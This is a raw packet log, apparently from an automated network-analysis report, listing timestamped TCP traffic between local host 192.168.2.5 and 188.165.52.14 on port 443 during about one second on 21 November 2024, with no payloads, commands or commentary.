                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.732364893 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.732429028 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.732439041 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.732477903 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.736148119 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.736166000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.736253023 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.736278057 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.736326933 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.739469051 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.739485025 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.739547968 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.739554882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.739597082 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.906652927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.906683922 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.906766891 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.906797886 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.906816006 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.906845093 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.909806013 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.909826040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.909928083 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.909935951 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.909989119 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.913763046 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.913781881 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.913901091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.913908958 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.913968086 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.917083979 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.917103052 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.917159081 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.917165995 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.917213917 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.920922995 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.920952082 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.921027899 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.921040058 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.921295881 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.924132109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.924159050 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.924200058 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.924206972 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.924236059 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.924258947 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.928060055 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.928077936 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.928148985 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.928157091 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.928193092 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.928214073 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.931349993 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.931370020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.931441069 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.931452990 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:31.931823015 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.098453999 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.098484993 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.098622084 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.098654985 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.098705053 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.101917982 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.101938009 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.102009058 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.102016926 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.102063894 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.105859041 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.105878115 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.105941057 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.105948925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.105990887 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.109060049 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.109081984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.109128952 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.109136105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.109183073 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.113022089 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.113044024 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.113111973 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.113118887 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.113172054 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.116264105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.116283894 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.116362095 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.116369009 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.116417885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.120213032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.120260954 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.120321989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.120330095 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.120383024 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.123476028 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.123502016 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.123569965 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.123590946 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.123632908 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.291057110 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.291084051 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.291204929 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.291232109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.291280985 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.294054031 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.294073105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.294140100 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.294147968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.294193029 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.297772884 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.297790051 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.297854900 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.297863007 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.297904968 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.301034927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.301054955 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.301119089 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.301126957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.301172018 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.304943085 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.304961920 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.305022955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.305032015 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.305074930 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.308140993 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.308161020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.308223009 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.308231115 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.308269978 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.312112093 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.312131882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.312227011 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.312235117 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.312277079 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.315525055 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.315545082 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.315608978 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.315617085 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.315661907 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.483150959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.483201027 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.483249903 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.483282089 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.483323097 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.483352900 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.485908031 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.485941887 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.485995054 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.486001968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.486037970 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.486061096 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.490001917 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.490021944 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.490135908 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.490144968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.490202904 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.493122101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.493141890 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.493221045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.493228912 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.493273973 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.497035980 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.497061968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.497109890 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.497123003 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.497149944 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.497169971 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.500375032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.500394106 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.500458002 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.500466108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.500509977 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.504189968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.504210949 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.504273891 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.504281998 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.504323006 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.507435083 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.507456064 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.507522106 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.507529020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.507572889 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.674645901 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.674664974 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.674753904 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.674772024 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.674818993 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.678597927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.678612947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.678678989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.678684950 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.678725004 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.681760073 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.681773901 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.681847095 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.681854010 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.681916952 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.684964895 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.684981108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.685046911 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.685053110 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.685094118 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.688931942 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.688949108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.689017057 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.689023018 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.689063072 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.692188978 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.692203045 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.692265987 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.692271948 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.692312956 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.696115017 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.696130037 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.696196079 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.696203947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.696249008 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.699383020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.699426889 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.699469090 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.699475050 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.699506998 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.699527025 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.866535902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.866586924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.866689920 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.866720915 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.866758108 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.866780043 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.869993925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.870011091 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.870085955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.870094061 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.870143890 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.874005079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.874021053 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.874093056 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.874100924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.874145985 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.877194881 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.877209902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.877271891 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.877279997 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.877322912 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.881159067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.881172895 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.881239891 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.881247044 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.881290913 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.884356022 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.884370089 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.884430885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.884438038 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.884480953 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.888299942 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.888329983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.888394117 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.888411045 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.888453960 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:32.891701937 CET44349824188.165.52.14192.168.2.5
